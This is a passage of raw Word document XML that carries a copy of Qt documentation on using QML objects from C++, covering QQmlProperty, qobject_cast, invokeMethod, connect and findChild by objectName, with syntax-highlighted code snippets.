      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"width"</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500</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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlProperty</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object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"width"</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write</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>500</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EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Alternatively, you can cast the object to its actual type and call methods with compile-time safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In this case the base object of</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MyItem.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is an</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2912" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which is defined by the</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2913" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class:</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QQuickItem</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item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qobject_cast</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>item</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setWidth</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>500</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CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can also connect to any signals or call methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> defined in the component using</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2914" w:anchor="invokeMethod" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QMetaObject::invokeMethod</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2915" w:anchor="connect" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::connect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(). See</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2916" w:anchor="invoking-qml-methods" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Invoking QML Methods</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2917" w:anchor="connecting-to-qml-signals" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connecting to QML Signals</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>below for further details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2625" w:name="accessing-loaded-qml-objects-by-object-n"/>
      <w:bookmarkStart w:id="2626" w:name="_Toc483001105"/>
      <w:bookmarkStart w:id="2627" w:name="_Toc483004074"/>
      <w:bookmarkStart w:id="2628" w:name="_Toc483604438"/>
      <w:bookmarkStart w:id="2629" w:name="_Toc483605658"/>
      <w:bookmarkEnd w:id="2625"/>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accessing Loaded QML Objects by Object Name</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2626"/>
      <w:bookmarkEnd w:id="2627"/>
      <w:bookmarkEnd w:id="2628"/>
      <w:bookmarkEnd w:id="2629"/>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EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML components are essentially object trees with children that have siblings and their own children.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Child objects of QML components can be located using the</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2918" w:anchor="objectName-prop" w:history="1">
        <w:r w:rsidRPr="00EB7BA7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::objectName</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property with</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2919" w:anchor="findChild" w:history="1">
        <w:r w:rsidRPr="00EB7BA7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::findChild</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> For </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, if the root item in</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MyItem.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>had a child</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2920" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>item:</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import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QtQuick</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2.0</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Item</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width</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100</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height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100</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Rectangle</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anchors</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fill</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parent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="001945D5" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objectName</w:t>
      </w:r>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"rect"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lang w:val="en-US"/>
        </w:rPr>
      </w:pP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CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The child could be located like this:</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QObject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rect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lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>findChild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"rect"</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if</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rect</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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    rect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
